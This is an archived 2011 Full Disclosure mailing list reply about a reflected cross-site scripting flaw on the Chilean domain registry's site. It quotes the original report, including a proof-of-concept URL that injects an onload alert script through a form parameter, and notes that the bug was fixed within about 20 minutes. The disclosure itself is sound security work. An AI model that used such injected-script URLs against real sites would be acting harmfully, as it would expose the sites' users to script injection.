Full Disclosure mailing list archives

Re: XSS on NIC Chile

From: ksha <ksha () mitm cl>
Date: Wed, 20 Apr 2011 13:19:40 -0300


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 04/20/2011 12:36 PM, Zerial. wrote:

* Main URI: http://www.nic.cl

* Type: Cross Site Scripting

* Exploitable URI:
http://www.nic.cl/cgi-bin/show-form?f=/example/201001191941%3Cbody%20onload=alert%28this%29%3E3a6

* Status: *Reported*


* Date: April 20, 2011, 12:27 p.m.

Reported on: http://www.secureless.org/vulnerability/1347/


this bug has been marked as fixed, in a timeline around 20 minutes
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


- -- 

Ninja Coder

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJNrwecAAoJEP64MfdRn+k8j5MH/3n0eF4O3093/nt68czYtUoJ
lnorpeQxlVwumBVX7TZObfMTN//4LuOpKRcamYJaPwwuwk1fsVFZ7m9YprYmYXFU
wCwyIsK58mAUZvUW8ctt85JEm4QerviAAROMnZkOXVn/SRHVufFfd7dZyBYOD49d
G2iBuddLrfcHZ3SW38EAmDxuqsw7cTyZ6Y8xm1nWtz8ilBadyigDqJNFngSRd5XE
k6RoxJxG6KXCli08uyYBXIGWnQ03lB0FN16UaLCtqxL/ERB9jlyJkl3vbVU0Pw4b
QZcJZ7+5/xoj8y7DuqKUucg8xRmtvq2ArgnbPI2FVJZHD/VDtcxY/76siyOD84s=
=TTm9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

XSS on NIC Chile Zerial. (Apr 20)
- Re: XSS on NIC Chile Zerial. (Apr 20)
- Re: XSS on NIC Chile ksha (Apr 21)
- Multiple XSS+XSRF found at Movistar Chile ksha (Apr 26)